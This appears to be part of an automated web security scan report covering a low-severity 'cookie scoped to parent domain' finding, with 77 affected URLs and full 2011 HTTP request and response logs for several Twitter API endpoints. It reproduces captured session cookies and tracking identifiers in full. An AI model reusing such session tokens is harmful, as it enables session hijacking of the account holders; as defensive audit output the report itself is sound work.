mFseXRpY3MgQ29kZSBFbmQgLS0+ZAIFD2QWAgIBD2QWAmYPZBYCZg9kFgJmDxYCHwAFxgo8ZGl2IGNsYXNzPSJibG9jayBzc2wtYnktYnJhbmQiPg0KPGRpdiBjbGFzcz0iYmxvY2stdGl0bGUiPjxzcGFuPlNTTCBieSBCcmFuZDwvc3Bhbj48L2Rpdj4NCjxkaXYgY2xhc3M9ImJsb2NrLWNvbnRlbnQiPg0KPHVsPg0KPGxpPjxhIGhyZWY9Ii9zc2wtYnJhbmRzL3JhcGlkc3NsIj4NCjxoMT5SYXBpZFNTTDwvaDE+DQo8L2E+PC9saT4NCjxsaT48YSBocmVmPSIvc3NsLWJyYW5kcy9nZW90cnVzdC1zc2wiPg0KPGgxPkdlb1RydXN0PC9oMT4NCjwvYT48L2xpPg0KPGxpIGNsYXNzPSJsYXN0Ij48YSBocmVmPSIvc3NsLWJyYW5kcy90aGF3dGUtc3NsIj4NCjxoMT5UaGF3dGU8L2gxPg0KPC9hPjwvbGk+DQo8bGkgY2xhc3M9InRpdGxlIj5TU0wgYnkgUHJpY2U8L2xpPg0KPGxpPjxhIGhyZWY9Ii9zc2wtcHJvbW90aW9uLWNvZGUvc3NsLXByaWNlIzB0bzUwIj4kMCAtICQ1MDwvYT48L2xpPg0KPGxpPjxhIGhyZWY9Ii9zc2wtcHJvbW90aW9uLWNvZGUvc3NsLXByaWNlIzUwdG8xMDAiPiQ1MCAtICQxMDA8L2E+PC9saT4NCjxsaT48YSBocmVmPSIvc3NsLXByb21vdGlvbi1jb2RlL3NzbC1wcmljZSMxMDB0bzIwMCI+JDEwMCAtICQyMDA8L2E+PC9saT4NCjxsaSBjbGFzcz0ibGFzdCI+PGEgaHJlZj0iL3NzbC1wcm9tb3Rpb24tY29kZS9zc2wtcHJpY2UjMjAwIj4kMjAwIC0gTW9yZTwvYT48L2xpPg0KPGxpIGNsYXNzPSJ0aXRsZSI+U1NMIGJ5IFR5cGU8L2xpPg0KPGxpPjxhIGhyZWY9Ii9zc2xjZXJ0aWZpY2F0ZXMvZG9tYWluLXNzbCI+RG9tYWluIFZhbGlkYXRpb24gU1NMPC9hPjwvbGk+DQo8bGk+PGEgaHJlZj0iL3NzbGNlcnRpZmljYXRlcy9idXNpbmVzcy12YWxpZGF0aW9uLXNzbCI+QnVzaW5lc3MgVmFsaWRhdGlvbiBTU0w8L2E+PC9saT4NCjxsaT48YSBocmVmPSIvc3NsY2VydGlmaWNhdGVzL3dpbGRjYXJkLWNlcnRpZmljYXRlcyI+DQo8aDE+V2lsZGNhcmQgU1NMIENlcnRpZmljYXRlPC9oMT4NCjwvYT48L2xpPg0KPGxpPjxhIGhyZWY9Ii9zc2xjZXJ0aWZpY2F0ZXMvZXYtc3NsLWNlcnRpZmljYXRlcyI+DQo8aDE+RVYgU1NMIENlcnRpZmljYXRlPC9oMT4NCjwvYT48L2xpPg0KPGxpIGNsYXNzPSJsYXN0Ij48YSBocmVmPSIvc3NsY2VydGlmaWNhdGVzL2NvZGUtc2lnbmluZy1jZXJ0aWZpY2F0ZSI+DQo8aDE+Q29kZSBTaWduaW5nIENlcnRpZmljYXRlPC9oMT4NCjwvYT48L2xpPg0KPC91bD4NCjwvZGl2Pg0KPC9kaXY+DQo8cCBzdHlsZT0idGV4dC1hbGlnbjogY2VudGVyOyBjbGVhcjogYm90aDsiPg0KPHNjcmlwdCBzcmM9Imh0dHBzOi8vc21hcnRpY29uLmdlb3RydXN0LmNvbS9zaS5qcyIgdHlwZT0idGV4dC9qYXZhc2NyaXB0Ij48L3NjcmlwdD4NCjwvcD5kAgYPZBYCZg9kFgJmD2QWCmYPFgIfAAV4PHA+PHNwYW4gc3R5bGU9ImZvbnQtc2l6ZTogbWVkaXVtOyI+PHN0cm9uZz5TaG9wIFNTTCBDZXJ0aWZpY2F0ZSBCeSBQcmljZTwvc3Ryb25nPjwvc3Bhbj48L3A+DQo8cD4mbmJzcDs8YnIgLz48YnIgLz48L3A+ZAICDxYCHgtfIUl0ZW1Db3VudAIBFgICAQ9kFgZmDxUCDGNvbG9yICAgbGFzdCkvc3NsLWJyYW5kcy9yYXBpZHNzbC9yYXBpZHNzbC1jZXJ0aWZpY2F0ZWQCAQ8PFgIfAAUUUmFwaWRTU0wgQ2VydGlmaWNhdGVkZAICDxUCBTE5LjAwBjEwMS4wMGQCBA8WAh8CAgIWBAIBD2QWBmYPFQIFY29sb3IpL3NzbC1icmFuZHMvZ2VvdHJ1c3Qtc3NsL3F1aWNrc3NsLXByZW1pdW1kAgEPDxYCHwAFHFF1aWNrU1NMIFByZW1pdW0gQ2VydGlmaWNhdGVkZAICDxUCBTg1LjgwBjE2Ny4wMGQCAg9kFgZmDxUCByAgIGxhc3QdL3NzbC1icmFuZHMvdGhhd3RlLXNzbC9zc2wxMjNkAgEPDxYCHwAFDVRoYXd0ZSBTU0wxMjNkZAICDxUCBTU5LjAwBjM1NC4wMGQCBg8WAh8CAgMWBgIBD2QWBmYPFQIFY29sb3IyL3NzbC1icmFuZHMvcmFwaWRzc2wvcmFwaWRzc2wtd2lsZGNhcmQtY2VydGlmaWNhdGVkAgEPDxYCHwAFHVJhcGlkU1NMIFdpbGRjYXJkIENlcnRpZmljYXRlZGQCAg8VAgYxMzEuMDAGMTQxLjAwZAICD2QWBmYPFQIAKC9zc2wtYnJhbmRzL2dlb3RydXN0LXNzbC90cnVlLWJ1c2luZXNzaWRkAgEPDxYCHwAFG1RydWUgQnVzaW5lc3NJRCBDZXJ0aWZpY2F0ZWRkAgIPFQIGMTI5LjgwBjE0Ny4wMGQCAw9kFgZmDxUCDGNvbG9yICAgbGFzdCQvc3NsLWJyYW5kcy90aGF3dGUtc3NsL3dlYnNlcnZlci1zc2xkAgEPDxYCHwAFFVRoYXd0ZSBTU0wgV2ViIFNlcnZlcmRkAgIPFQIGMTM5LjAwBjQwNC4wMGQCCA8WAh8CAgIWBAIBD2QWBmYPFQIFY29sb3IlL3NzbC1icmFuZHMvZ2VvdHJ1c3Qtc3NsL2NoZWFwLWV2LXNzbGQCAQ8PFgIfAAUjVHJ1ZSBCdXNpbmVzc0lEIHdpdGggRVYgQ2VydGlmaWNhdGVkZAICDxUCBjIyNC41MAU3NC4wMGQCAg9kFgZmDxUCByAgIGxhc3QvL3NzbC1icmFuZHMvdGhhd3RlLXNzbC9jb2RlLXNpZ25pbmctY2VydGlmaWNhdGVkAgEPDxYCHwAFEFRoYXd0ZSBDb2RlIFNpZ25kZAICDxUCBjIwOS41MAYxMzAuMDBkAgcPZBYCAgEPZBYCZg9kFgJmD2QWAmYPZBYCZg8WAh8ABd4EPHAgc3R5bGU9InRleHQtYWxpZ246IGNlbnRlcjsiPjxpbWcgc3JjPSIvaW1hZ2VzLzMwZGF5c21vbmV5YmFjay5qcGciIGFsdD0iMzAgRGF5cyBNb25leSBCYWNrIiAvPjwvcD4NCjxwPiZuYnNwOzwvcD4NCjxkaXYgY2xhc3M9ImJsb2NrIHBsYXRpbnVtX3BhcnRuZXIiPg0KPGRpdiBjbGFzcz0iYmxvY2stdGl0bGUiPjxzcGFuPlNTTCBSZXNlbGxlcjwvc3Bhbj48L2Rpdj4NCjxkaXYgY2xhc3M9ImJsb2NrLWNvbnRlbnQiPjxpbWcgc3JjPSIvaW1hZ2VzL3JhcGlkX3NzbC5qcGciIGFsdD0iUmFwaWRTU0wiIC8+PGJyIC8+PGJyIC8+PGltZyBzcmM9Ii9pbWFnZXMvZ2VvdHJ1c3Rfc3NsLmpwZyIgYWx0PSJHZW9UcnVzdCIgLz48YnIgLz48YnIgLz48aW1nIHNyYz0iL2ltYWdlcy90aGF3dGVfc3NsLmpwZyIgYWx0PSJUaGF3dGUiIC8+PC9kaXY+DQo8L2Rpdj4NCjxkaXYgY2xhc3M9ImJsb2NrIHBheXBhbCI+DQo8ZGl2IGNsYXNzPSJibG9jay10aXRsZSI+PHNwYW4+V2UgQWNjZXB0PC9zcGFuPjwvZGl2Pg0KPGRpdiBjbGFzcz0iYmxvY2stY29udGVudCI+PGltZyBzcmM9Ii9pbWFnZXMvcGF5cGFsLmpwZyIgYWx0PSJQYXlQYWwgU1NMIiAvPjwvZGl2Pg0KPC9kaXY+ZAIJD2QWAmYPZBYCZg9kFgICAQ8WAh8ABfMGPGRpdiBjbGFzcz0iZm9vdGVyX3RvcCI+DQo8ZGl2IGNsYXNzPSJicm93c2VycyI+PGltZyBzcmM9Ii9pbWFnZXMvYnJvd3NlcnMuanBnIiBhbHQ9IiIgLz48L2Rpdj4NCjxkaXYgY2xhc3M9InB1cmNoYXNlIj48aW1nIHNyYz0iL2ltYWdlcy9wdXJjaGFzZS13b3Jrcy5qcGciIGFsdD0iQnV5IENoZWFwIFNTTCBDZXJ0aWZpY2F0ZXMiIC8+PC9kaXY+DQo8dWw+DQo8aDI+V2h5IFNTTE1hdHJpeC5jb20/PC9oMj4NCjxsaT4zMCBEYXkgMTAwJSBtb25leSBiYWNrIGd1YXJhbnRlZTwvbGk+DQo8bGk+RWFzeSBhbmQgc2VjdXJlIFNTTCBvcmRlciBwcm9jZXNzPC9saT4NCjxsaT5JbnN0YW50IFNTTCBpc3N1YW5jZSAtIDI0LzcvMzY1PC9saT4NCjxsaT5MaWZlIHNwYW4gZnJlZSBTU0wgcmVpc3N1ZSBpbnN1cmFuY2U8L2xpPg0KPGxpPldvcmxkIHdpZGUgYXV0aG9yaXplZCBTU0wgcmVzZWxsZXI8L2xpPg0KPGxpPkZyZWUgU1NMIHNpdGUgc2VhbCBvbiBTU0wgcHVyY2hhc2U8L2xpPg0KPC91bD4NCjwvZGl2Pg0KPGRpdiBjbGFzcz0iZm9vdGVyX2JvdHRvbSI+DQo8ZGl2IGNsYXNzPSJmb290ZXJfYm90dG9tX2xlZnQiPjxhIGhyZWY9Ii8iPkhvbWU8L2E+IHwgPGEgaHJlZj0iL3NzbC1icmFuZHMiPlNTTCBCcmFuZHM8L2E+IHwgPGEgaHJlZj0iL3NzbGNlcnRpZmljYXRlcyI+U1NMIENlcnRpZmljYXRlczwvYT4gfCA8YSBocmVmPSIvc3NsLXByb21vdGlvbi1jb2RlIj5TU0wgUHJvbW90aW9uPC9hPiB8IDxhIGhyZWY9Ii9TU0xUb29scyI+U1NMIFRvb2xzPC9hPiB8IDxhIGhyZWY9Ii9jb250YWN0dXMiPkNvbnRhY3QgVXM8L2E+IHwgPGEgaHJlZj0iL1NTTFRvb2xzL3doYXQtaXMtc3NsLWNlcnRpZmljYXRlIj5TU0wgRkFRczwvYT48L2Rpdj4NCjwvZGl2PmRk" />
...[SNIP]...

10. Cookie scoped to parent domain previous next
There are 77 instances of this issue:

http://api.twitter.com/1/statuses/media_timeline.json
http://api.twitter.com/1/statuses/user_timeline.json
http://api.twitter.com/1/statuses/user_timeline/MSFTResearch.json
http://api.twitter.com/1/statuses/user_timeline/SharePoint.json
http://api.twitter.com/1/statuses/user_timeline/msnewengland.json
http://api.twitter.com/1/trends/1.json
http://api.twitter.com/1/trends/available.json
http://api.twitter.com/1/urls/resolve.json
http://api.twitter.com/1/users/search.json
http://api.twitter.com/i/search/image_facets.json
http://api.twitter.com/i/search/video_facets.json
http://login.dotomi.com/ucm/UCMController
http://www.cheapssls.com/
http://www.cheapssls.com/index.php
http://adx.adnxs.com/mapuid
http://am.trafficmp.com/a/bpix
http://am.trafficmp.com/a/bpix
http://api.flickr.com/clientaccesspolicy.xml
http://b.scorecardresearch.com/b
http://b.scorecardresearch.com/r
http://bh.contextweb.com/bh/set.aspx
http://c7.zedo.com/img/bh.gif
https://cart.godaddy.com/basket.aspx
http://cf.addthis.com/red/p.json
http://cf.addthis.com/red/usync
http://cspix.media6degrees.com/orbserv/hbpix
http://d7.zedo.com/img/bh.gif
http://d7.zedo.com/img/bh.gif
http://ds.addthis.com/red/psi/sites/vasco.com/p.json
http://ib.adnxs.com/getuid
http://ib.adnxs.com/seg
http://ib.adnxs.com/setuid
http://id.google.com/verify/EAAAAB18MDCNmAWnZ6ZMKxFbyXM.gif
http://id.google.com/verify/EAAAADMsrH8QTeh7gqteYecpwnc.gif
http://id.google.com/verify/EAAAALzxzy-p1oHxNaVBpSOT2kM.gif
http://idcs.interclick.com/Segment.aspx
https://idp.godaddy.com/login.aspx
https://idp.godaddy.com/retrieveaccount.aspx
http://image2.pubmatic.com/AdServer/Pug
http://img.godaddy.com/image.aspx
http://img.godaddy.com/pageevents.aspx
http://m.adnxs.com/msftcookiehandler
https://mya.godaddy.com/
https://mya.godaddy.com/products/accountlist.aspx
http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/index/1269119279@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom
http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/viewproductdetail/getadomain/1680914497@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom
http://pixel.adblade.com/imps.php
http://pixel.mathtag.com/event/img
http://pixel.mathtag.com/event/js
http://pixel.rubiconproject.com/tap.php
http://pixel.rubiconproject.com/tap.php
http://r.openx.net/set
http://scripts.omniture.com/global/scripts/targeting/dyn_prop.php
http://segment-pixel.invitemedia.com/set_partner_uid
http://social.expression.microsoft.com/Forums/ar-SA/wpf/thread/786f2813-de28-4eda-ba14-9910ce655dc6
http://social.expression.microsoft.com/Forums/da-DK/wpf/thread/16309d89-5f65-4e49-9ce5-38f2a466a2c0
http://static.getclicky.com/js
http://www.godaddy.com/Payment/payment-options.aspx
http://www.godaddy.com/affiliates/affiliate-program.aspx
http://www.godaddy.com/gdshop/offers/cross_sell.asp
http://www.godaddy.com/shared/video/videos.aspx
http://www.godaddy.com/ssl/JsonContent/GetMultiDomainsPlanList.aspx
http://www.godaddy.com/ssl/ssl-certificates.aspx
http://www.register.com/css/basic.css
http://www.register.com/css/titan-screen.css
http://www.register.com/imgs/global/crtIcon.gif
http://www.register.com/imgs/global/registerLogo.gif
http://www.register.com/js/aop-attach.js
http://www.register.com/js/global.js
http://www.register.com/js/jquery-1.3.2.min.js
http://www.register.com/js/jquery-ui-1.7.1.custom.min.js
http://www.register.com/js/jquery.cookie.js
http://www.register.com/js/jquery.jcarousellite.js
http://www.register.com/js/mbox.js
http://www.register.com/js/nicejforms.js
http://www.register.com/js/s_code.js
http://www.register.com/js/thickbox.js

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

10.1. http://api.twitter.com/1/statuses/media_timeline.json previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://api.twitter.com
Path:	/1/statuses/media_timeline.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

_twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yASIKZmxhc2hJQzonQWN0aW9uQ29udHJv%250AbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoHaWQiJWMwZjc0%250AY2Y5NzAzODgxYzk2NDA4NDRjYjJiMWQwZjc0--8a55b228d53168b95cece830b4c206eb17826d5f; domain=.twitter.com; path=/; HttpOnly

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/statuses/media_timeline.json?offset=0&count=100&page=0&filter=false&include_entities=true&user_id=21457289 HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://api.twitter.com/receiver.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
X-Phx: true
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; k=50.23.123.106.1314797552347130; __utma=43838368.1721518288.1314976448.1314976448.1315055110.2; __utmb=43838368.1.10.1315055110; __utmc=43838368; __utmz=43838368.1315055110.2.2.utmcsr=research.microsoft.com|utmccn=(referral)|utmcmd=referral|utmcct=/en-us/projects/wwt/contest.aspx; _twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yASIKZmxhc2hJQzonQWN0aW9uQ29udHJv%250AbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoHaWQiJWMwZjc0%250AY2Y5NzAzODgxYzk2NDA4NDRjYjJiMWQwZjc0--8a55b228d53168b95cece830b4c206eb17826d5f

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 13:04:34 GMT
Server: hi
Status: 200 OK
X-Transaction: 1315055074-42775-36000
X-RateLimit-Limit: 1000
ETag: "1f9f43b2fa532e89f1e2cf41e94dd8ca"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Sat, 03 Sep 2011 13:04:34 GMT
X-RateLimit-Remaining: 994
X-Runtime: 0.01328
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114c0426a34
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api_phoenix
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: cabd62773ef621a8fa964ea84b4f0676e1d53b46
X-RateLimit-Reset: 1315058673
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yASIKZmxhc2hJQzonQWN0aW9uQ29udHJv%250AbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoHaWQiJWMwZjc0%250AY2Y5NzAzODgxYzk2NDA4NDRjYjJiMWQwZjc0--8a55b228d53168b95cece830b4c206eb17826d5f; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 6331
Connection: close

[{"id_str":"12649013418","in_reply_to_status_id":null,"truncated":false,"user":{"profile_sidebar_fill_color":"e3e4e2","protected":false,"id_str":"21457289","notifications":null,"profile_background_til
...[SNIP]...

10.2. http://api.twitter.com/1/statuses/user_timeline.json previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://api.twitter.com
Path:	/1/statuses/user_timeline.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

_twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yASIKZmxhc2hJQzonQWN0aW9uQ29udHJv%250AbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoHaWQiJWMwZjc0%250AY2Y5NzAzODgxYzk2NDA4NDRjYjJiMWQwZjc0--8a55b228d53168b95cece830b4c206eb17826d5f; domain=.twitter.com; path=/; HttpOnly

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/statuses/user_timeline.json?screen_name=FrankGruber&count=9&callback=jsonp1315055747616 HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://frankgruber.me/post/9680693152/the-view-looking-out-from-techcocktail-boston-at
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; k=50.23.123.106.1314797552347130; original_referer=JbKFAfGwv4RwApvTLqS%2BuSg2nN6n6Sc2FNg%2B%2FJZdApHOHiilCO8gnQ%3D%3D; __utma=43838368.1721518288.1314976448.1314976448.1315055110.2; __utmb=43838368.2.10.1315055110; __utmc=43838368; __utmz=43838368.1315055110.2.2.utmcsr=research.microsoft.com|utmccn=(referral)|utmcmd=referral|utmcct=/en-us/projects/wwt/contest.aspx; _twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yASIKZmxhc2hJQzonQWN0aW9uQ29udHJv%250AbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoHaWQiJWMwZjc0%250AY2Y5NzAzODgxYzk2NDA4NDRjYjJiMWQwZjc0--8a55b228d53168b95cece830b4c206eb17826d5f

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 13:15:11 GMT
Server: hi
Status: 200 OK
X-Transaction: 1315055711-7665-16121
X-RateLimit-Limit: 150
ETag: "49cc5068c90057edef228205e1476288"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Sat, 03 Sep 2011 13:15:11 GMT
X-RateLimit-Remaining: 42
X-Runtime: 0.04128
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114c0426a34
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: c8c6573bf9320edb145379ebdb80a35520ad745e
X-RateLimit-Reset: 1315058926
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yASIKZmxhc2hJQzonQWN0aW9uQ29udHJv%250AbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoHaWQiJWMwZjc0%250AY2Y5NzAzODgxYzk2NDA4NDRjYjJiMWQwZjc0--8a55b228d53168b95cece830b4c206eb17826d5f; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 19248
Connection: close

jsonp1315055747616([{"id_str":"109817941297610752","in_reply_to_status_id":null,"truncated":false,"user":{"profile_sidebar_fill_color":"262626","protected":false,"id_str":"820828","notifications":null
...[SNIP]...

10.3. http://api.twitter.com/1/statuses/user_timeline/MSFTResearch.json previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://api.twitter.com
Path:	/1/statuses/user_timeline/MSFTResearch.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

_twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yASIKZmxhc2hJQzonQWN0aW9uQ29udHJv%250AbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoHaWQiJWMwZjc0%250AY2Y5NzAzODgxYzk2NDA4NDRjYjJiMWQwZjc0--8a55b228d53168b95cece830b4c206eb17826d5f; domain=.twitter.com; path=/; HttpOnly

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/statuses/user_timeline/MSFTResearch.json?callback=twitterCallback1&count=20&include_rts=true&cb=0.9466070765629411 HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/MicrosoftResearch/tabid/81/Default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; k=50.23.123.106.1314797552347130; __utma=43838368.1721518288.1314976448.1314976448.1315055110.2; __utmb=43838368.1.10.1315055110; __utmc=43838368; __utmz=43838368.1315055110.2.2.utmcsr=research.microsoft.com|utmccn=(referral)|utmcmd=referral|utmcct=/en-us/projects/wwt/contest.aspx; original_referer=JbKFAfGwv4RwApvTLqS%2BuSg2nN6n6Sc2FNg%2B%2FJZdApHOHiilCO8gnQ%3D%3D; _twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yASIKZmxhc2hJQzonQWN0aW9uQ29udHJv%250AbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoHaWQiJWMwZjc0%250AY2Y5NzAzODgxYzk2NDA4NDRjYjJiMWQwZjc0--8a55b228d53168b95cece830b4c206eb17826d5f

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 13:10:45 GMT
Server: hi
Status: 200 OK
X-Transaction: 1315055445-71261-45206
X-RateLimit-Limit: 150
ETag: "aca9628d4a3fc4347dcea521d1a5dc51"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Sat, 03 Sep 2011 13:10:45 GMT
X-RateLimit-Remaining: 80
X-Runtime: 0.05589
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114c0426a34
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: c60411d9469e43c5b4c2ea13d48be94ea96dc19b
X-RateLimit-Reset: 1315058926
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yASIKZmxhc2hJQzonQWN0aW9uQ29udHJv%250AbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoHaWQiJWMwZjc0%250AY2Y5NzAzODgxYzk2NDA4NDRjYjJiMWQwZjc0--8a55b228d53168b95cece830b4c206eb17826d5f; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 40168
Connection: close

twitterCallback1([{"id_str":"108992350654693376","in_reply_to_status_id":null,"truncated":false,"user":{"profile_sidebar_fill_color":"e3e4e2","protected":false,"id_str":"21457289","default_profile":fa
...[SNIP]...

10.4. http://api.twitter.com/1/statuses/user_timeline/SharePoint.json previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://api.twitter.com
Path:	/1/statuses/user_timeline/SharePoint.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

_twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yAToHaWQiJWMwZjc0Y2Y5NzAzODgxYzk2%250ANDA4NDRjYjJiMWQwZjc0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpG%250AbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--2bdd9ccfd8301fad420f5a78e2f8cdea7f06f986; domain=.twitter.com; path=/; HttpOnly

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/statuses/user_timeline/SharePoint.json?callback=twitterCallback1&count=20&include_rts=true&cb=0.07148340088315308 HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/tabid/55/Default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
